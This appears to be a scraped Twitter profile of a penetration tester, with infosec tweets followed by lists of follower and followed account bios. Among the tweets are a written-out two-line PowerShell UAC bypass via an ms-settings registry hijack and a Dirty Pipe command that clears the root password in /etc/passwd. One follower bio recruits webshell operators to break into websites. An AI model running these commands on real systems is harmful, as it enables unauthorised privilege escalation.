Ghost_fh @faridpy
OSCP | OSWE | Synack Red Team Member | Security Researcher | Core Pentester at Cobalt. Joined November 2012-
Tweets105
-
Followers242
-
Following304
-
Likes804
@StrglrX0 Any good resource(s) in JavaScript language. The point about vulnerability finding is to learn the code behind it. To understand SQL injection for example, you need to understand SQL. XSS is in fact JavaScript Injection so you must improve your JavaScript skills.
Hacked up a quick Dirty Pipe PoC that spawns a shell by hijacking (and restoring) the contents of a setuid binary. haxx.in/files/dirtypip…
Clear out the root password using CVE-2022-0847 - dirtypipe.cm4all.com ./CVE-2022-0847 /etc/passwd 1 ootz:
Microsoft Exchange Server SSRF Exploit. vanshal.medium.com/pre-auth-ssrf-… #bugbounty #infosec
Boom. Easy uXSS in any version of Firefox💥 Tools needed - Firefox, Bash and a working mind🌚 #bugbountytips #bugbounty
Looking to learn more about getting started with Android application security? Don’t forget to check out @avanish46’s in-depth introductory guide: bit.ly/3wvXbec
We are excited to announce that Cobalt is now SOC 2 Type II certified! Learn more about SOC 2 compliance and what this means for Cobalt customers in this post by our InfoSec Manager, Alex Jones. cobalt.io/blog/announcin…
If you want to get started with android application security, I have summarised all the resources in one place and blogged about it. Do give it a read and I hope you find it useful. Thanks @cobalt_io for giving me this opportunity ✌️ #android #security blog.cobalt.io/getting-starte…
We don't have to introduce you to @sqlmap by @stamparm: it's the go-to tool for detecting and exploiting SQL injection vulnerabilities. But did you know you can also use CSRF tokens and multi-threading? Check out our quick guide! 👇 blog.intigriti.com/2021/05/23/hac…
A writeup about my latest finding SSRF in PDF Renderer using SVG #ssrf #svg #bugbountytips #bugbounty pwn.vg/articles/2021-…
What goes into an effective #pentest report? For the first installment of a two-part blog series, we’ll dive into the details of vulnerability reports. Breaking down each report section, sharing examples, and tips on how to enhance your report writing: bit.ly/3oBMKm8
All About Bug Bounty:- Updated. All about bug websites (bypasses, payloads, and etc) github.com/daffainfo/AllA…
Learn about the CSP security header, something that confused me for a long time 😅 blog.shiftleft.io/intro-to-the-c…
Challenge: Is this code secure? 🤔Submit your answer here by April 25th! go.shiftleft.io/developer-chal…
My small research about attacks on remote debuggers of various languages acunetix.com/blog/web-secur… #bugbountytips #Pentesting
Don't miss this expert panel of speakers, including our own @CarolineWMWong, later today! See below for details.
Don't miss this expert panel of speakers, including our own @CarolineWMWong, later today! See below for details.
[TOOL RELEASE] - 𝗦𝗶𝗺𝗽𝗹𝗲𝗛𝗧𝗧𝗣𝗦𝗲𝗿𝘃𝗲𝗿 - Go alternative of python SimpleHTTPServer ✅ TCP server with customizable response ✅ File server with an arbitrary directory ✅ File upload support ✅ HTTPS support ✅ Basic auth support github.com/projectdiscove… #opensource
UAC bypass in 2 lines: ``` New-Item -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Value cmd.exe -Force New-ItemProperty -Path HKCU:\Software\Classes\ms-settings\shell\open\command -Name DelegateExecute -PropertyType String -Force ``` cmd -> fodhelper PoC||GTFO
Hackers, we have launched a brand new CTF level on #Hacker101 to put your AWS hacking skills to test! The flag from this level is worth 26 points and will get you an invite to one of the private programs hosted on @Hacker0x01! ctf.hacker101.com

Harsh Bothra @harshbothra_
43K Followers 741 Following Freelance Pentester & Consultant • Cobalt Core Lead & Pentester • Author • Speaker • Blogger • SecurityExplained • Project Bheem • Learn365 • Views are personal
root@MAALP🇮🇳 @MAALP1225
1K Followers 825 Following I’m learning | Nõöb!😑 | CREST CRT and CPSA | Hack-Eat-Sleep-Repeat | CEH | eWPTXv2 | eCPPTv2 | CAP | Security Consultant | #Beinspired
Securityboat @Securityb0at
2K Followers 278 Following Cyber Security Solutions Built On Customer Trust
Ninad Mathpati 🇮�... @Ninad_Mathpati
3K Followers 487 Following Founder and CEO @securityb0at | Entrepreneur | Security Workbook on Pentesting | Speaker
Timotheus Wayland @AarikaYona46248
2 Followers 99 Following Recruiting webshell engineers to pene trate websites, with a monthly salary of up to $100,000. If interested, please contact https://t.co/j1Qpz2qksj
nanjin002 @nanjin00272827
21 Followers 4K Following
crawler_cookie_0 @crawler_cookie0
49 Followers 4K Following
Lucy @hutchins_lucy39
315 Followers 3K Following
Roots Villa @roots_villa
0 Followers 99 Following
Ashutosh Singh Umath @As4t0sh
29 Followers 83 Following OSCP | eWPTXv2 | Cybersecurity Analyst at Network Intelligence
siLLyDaddy @sillydadddy
6K Followers 249 Following Son | Daddy 🐷 | Hacker | Offensive Security Senior Consultant | Ex Senior Software Developer | OSCP | eWPTX | CRTP | OCJP Views are my own !
Devansh Bordia @devansh_bordia
3K Followers 2K Following Security Engineer & Builder | Founder @Hackcubes | @Snapsy_dev | Prev Triager @Bugcrowd @Hacker0x01 | Writing on Security & AI
Free Fire @FreeeDudee
1 Followers 325 Following
Arun.S @he_hacks
333 Followers 1K Following Senior Security Team Lead | Bug Bounty Hunter | Speaker | CISM |OSCP |eWPTX V2| Null Bangalore Chapter Lead | Owasp Bangalore Volunteer | Bsides Organizer Lead
Melvin M @MelvinM05024111
6 Followers 216 Following
Rajesh Kumar @RajeshK87593498
27 Followers 1K Following
shubham mandloi @shubhammandloi
36 Followers 78 Following OSCP | eWPTXv2 | CRTP | Sr. Associate Information Security
Avanish Pathak @avanish46
7K Followers 508 Following Red Team Security Consultant | Lead Pentester @Cobalt_io |
Gaurav bhosale @SPYd3r00T
152 Followers 152 Following Application Security Engineer | Ex-mastercard, Payatu | Red team Member @synack | CRTP | CRTE
Atharv Sharma @AtharvvvSharma
50 Followers 171 Following #cyber_security_student #ethical_hacker #penetration_testing_learner #btechCSE_student
@nkur Singh @Ankursingh2907
25 Followers 3K Following
Mayank @Hunt2behunter
248 Followers 957 Following | Ctf player | SRT | eJPT | eWAPTX | CRTP|CVE-2022-28923
Falcnix 🦅 @falcnix
803 Followers 1K Following Core Member of @iotsrg1 | Hardware Hacker || These thoughts are my own and not reflective of my professional endeavors ||
XSS MICE @XssMice
1K Followers 345 Following Bug Bounty Hunter |Pentester| Osint|Threat Hunting | Student and Fan of @Thexssrat | Soc | Splunk
Libereau @Libereau_
106 Followers 404 Following Cybersecurity enthousiast, currently pentester, learning hardware hacking, Sometimes doing streams https://t.co/sa83iKiWKY
Juan Rey @JuanRey66
237 Followers 3K Following
Vijay @vijaypr70205150
10 Followers 159 Following Cyber Security Researcher | Red Teamer --Man is least himself when he talks in his own person. Give him a mask, and he will tell you the truth.--
Toto @Toto43089261
26 Followers 4K Following
Naivedya Pandey @tech_naivi
290 Followers 3K Following Cyber Crime Investigator | Security Trainer | Hacker | MGR | X Sec Engineer DRDO,IB,Police,Indian Army,Certin,UIDAI PT Expert Web,Mobile,API,Network,ThickClient
Abdallah Alhashmey @00011B1
158 Followers 5K Following Telecommunications and Network Engineering | industrial system engineering | scent enthusiast
Steve Nguyen @wed121188
5 Followers 462 Following
Praveen @fr3ak1337
5 Followers 3K Following
A @101a_aa
0 Followers 2K Following
yeshuibo @yeshuibo
106 Followers 6K Following
Ben Sadeghipour @NahamSec
233K Followers 1K Following Cofounder @hackinghub_io | Advisor @CaidoIO. I hack companies and make content about it. #NahamCon organizer. ex @hacker0x01🇮🇷
Aditya Shende @ADITYASHENDE17
60K Followers 420 Following MS Cyber 🇬🇧 | Work @BforeAI | @Bugcrowd Top 100 | Bug Bounty Trainer | Keynote Speaker | Professional Biker | @kong_sec 🇮🇳 | Own Views ≠ Employment
PentesterLab @PentesterLab
190K Followers 0 Following We make learning web hacking and security easier. Online systems, code review, videos & courses that can be used to understand, test and exploit bugs!
Intigriti @intigriti
193K Followers 658 Following Bug bounty & VDP platform trusted by the world’s largest organisations! 🌍
Harsh Bothra @harshbothra_
43K Followers 741 Following Freelance Pentester & Consultant • Cobalt Core Lead & Pentester • Author • Speaker • Blogger • SecurityExplained • Project Bheem • Learn365 • Views are personal
JS0N Haddix @Jhaddix
167K Followers 7K Following CEO, CISO, Trainer, Hacker, and Speaker. Cybersecurity + Hacking + AI + Sec Leadership @arcanuminfosec
bugcrowd @Bugcrowd
187K Followers 6K Following The leading provider of crowdsourced cybersecurity solutions purpose-built to secure the digitally connected world...Unleash Ingenuity™
TCM Security @TCMSecurity
207K Followers 360 Following Come learn to hack at TCM Security Academy! Veteran owned. Quality results.
Hussein Daher @HusseiN98D
49K Followers 197 Following Entrepreneur, Hacker 🇱🇧🇨🇮 @WebImmunify 21th/270000 BugCrowd Hacking Platform
payloadartist @payloadartist
42K Followers 286 Following Yapping about AI, AppSec, Hacking, & Cybersecurity • Helped secure organizations like Google • Opinions are my cat's • Part-time shitposter
Luke Stephens (hakluk... @hakluke
95K Followers 2K Following Hacker, marketer. I manage socials and produce amazing technical blogs for cybersecurity orgs. Founder of @hacker_content and @haksecio
OffSec @offsectraining
325K Followers 119 Following Empowering the world to fight cyber threats with indispensable cybersecurity skills and resources. Build the path to a secure future with OffSec.
Katie Paxton-Fear @InsiderPhD
93K Followers 2K Following Dr, apparently. Security Adovcate @semgrep & Hacker. #BugBounty hunter & #infosec YouTuber. APIs & Interlinked OffSec, PhD in AI+Sec @hacknotcrime. she/her
Securityboat @Securityb0at
2K Followers 278 Following Cyber Security Solutions Built On Customer Trust
Nathaniel @nnwakelam
41K Followers 919 Following
Dhruv Rathee @dhruv_rathee
3.1M Followers 616 Following YouTuber: 25 million+ subs⚡️TIME Magazine’s Next Generation Leaders 2023 • Traveller •
Ninad Mathpati 🇮�... @Ninad_Mathpati
3K Followers 487 Following Founder and CEO @securityb0at | Entrepreneur | Security Workbook on Pentesting | Speaker
Bhavuk Jain @bhavukjain1
14K Followers 618 Following Trying to make internet a safer place for everyone. Pentest Lead @Hacker0x01. Providing penetration testing services @ https://t.co/eTR0t81zbu
Vitthal Shinde🇮�... @0_1VitthalS
518 Followers 2K Following Cyber Security Enthusiastic #Its_all_Binary
Nuclei by ProjectDisc... @pdnuclei
36K Followers 184 Following Nuclei uses a vast templating library to scan applications, cloud infrastructure, and networks to find and remediate vulnerabilities.
siLLyDaddy @sillydadddy
6K Followers 249 Following Son | Daddy 🐷 | Hacker | Offensive Security Senior Consultant | Ex Senior Software Developer | OSCP | eWPTX | CRTP | OCJP Views are my own !
CertusCybersecurity @CertusCyber
212 Followers 12 Following Certus Cybersecurity provides industry-leading information security services to Fortune 100 enterprises and innovative, high-growth businesses worldwide.
Elizabeth Ramirez @tijuanera
1K Followers 1K Following Community Builder | Hacker Summer Camp 🛬 | BSidesLV
ProjectDiscovery @pdiscoveryio
37K Followers 125 Following Detect real, exploitable vulnerabilities. Harness the power of Nuclei for fast and accurate findings without false positives.
Frogy @iamthefrogy
4K Followers 87 Following Threat & Vulnerability Manager | OSCP CEH CTIA CCFA CCFH | Focus: VM, CTI, DevSecOps #infosec #cybersecurity #security #bugbounty #redteam
Ariel Garcia @Arl_rose
6K Followers 3K Following Community Builder. Pentester. Bug bounty Hunter. Bug bounty village @ DEFCON. https://t.co/PojmVAcqXQ Tweets are my own and not the views of my employer.
AppSecEngineer @AppSecEngineer
5K Followers 208 Following Painless Application Security Training for Enterprises. Empower Your Teams. Build Secure Applications.
Devansh Bordia @devansh_bordia
3K Followers 2K Following Security Engineer & Builder | Founder @Hackcubes | @Snapsy_dev | Prev Triager @Bugcrowd @Hacker0x01 | Writing on Security & AI
Mohammed Zubair @zoo_bear
1.4M Followers 3K Following Fact-Checker, Co-founder @AltNews | Analysing misinfo/disinfo across India | E-mail: [email protected] | insta : zoo_bear_
Bounty Security @BountySecurity
19K Followers 10K Following Offensive Web Application Security Software
PortSwigger Research @PortSwiggerRes
111K Followers 7 Following Web security research from the team at @PortSwigger
Youssef Sammouda (sam... @samm0uda
37K Followers 499 Following Hacker, bug bounty hunter, guy behind https://t.co/TBAtP71Cop. 1st in Meta bug bounty program for the last 6 years. YES Team Member
Nagli @galnagli
39K Followers 482 Following Hacker; Head of Threat Exposure at @wiz_io 🧙♂️; Bug Bounty Hunter; Live Hacking Events Winner
Nicolas Krassas @Dinosn
146K Followers 735 Following Head of Threat & Vulnerability Mgmt @ Henkel AG & Co. KGaA https://t.co/NC1orlKrW3
GeoSn0w @FCE365
121K Followers 585 Following Award-Winning YouTuber. Jailbreak Developer. https://t.co/7Kkd7MCWv6 | Bringing You Jailbreak News @ iDevice Central: https://t.co/VrSFuS1oDR
Mobile Security @mobilesecurity_
32K Followers 1K Following Mobile Security ✌🏻 #MobileSecurity #AndroidSecurity #iOSsecurity
tihmstar @tihmstar
63K Followers 215 Following Finding offsets since 2017 Email: [email protected] Patreon: https://t.co/FdMYUYWbqr
@Pwn20wnd @Pwn20wnd
210K Followers 290 Following Hacker @unc0verTeam. Jailbroke iOS 11.0-14.8. Helping Apple make iOS more secure by unc0vering real security issues. #unc0ver
chompie @chompie1337
83K Followers 1K Following hacker, weird machine mechanic, X-Force Offensive Research (XOR)
James Kettle @albinowax
79K Followers 92 Following Director of Research at PortSwigger aka Burp Suite. Find my research, tools & contact details at https://t.co/vP6UbGmvl3
Binni Shah @binitamshah
141K Followers 165 Following Linux Evangelist, Malwares, Security enthusiast , Investor, Contrarian , Philanthropist , Reformist , Sigma female 🦋 https://t.co/WOvf41tMKV
Khizer Javed @KHIZER_JAVED47
9K Followers 3K Following Hacker | Bug Bounty Hunter https://t.co/dBukRkjPbI
🥝🏳️🌈 Be... @gentilkiwi
62K Followers 286 Following A kiwi coding mimikatz & kekeo github: https://t.co/eS3LVgU6i0 Head of security services @banquedefrance Tweets are my own and not the views of my employer
Bug Bounty Reports Ex... @gregxsunday
52K Followers 616 Following Grzegorz Niedziela - a hacker who documents his hacking journey by creating and curating the best content about bug bounty and offensive security.
WPScan - WordPress Se... @_WPScan_
8K Followers 348 Following With our very own WordPress vulnerability database, WPScan is the leading software for WordPress security scanning.
Rogério Resende @_game0n
128 Followers 227 Following
TESS @ArmanSameer95
7K Followers 933 Following Application Security Researcher https://t.co/g0QPLb24tI | https://t.co/XuUMBUWl0x | Most Valuable Hacker 2022 thanks to @bugcrowd | ex @pdiscoveryio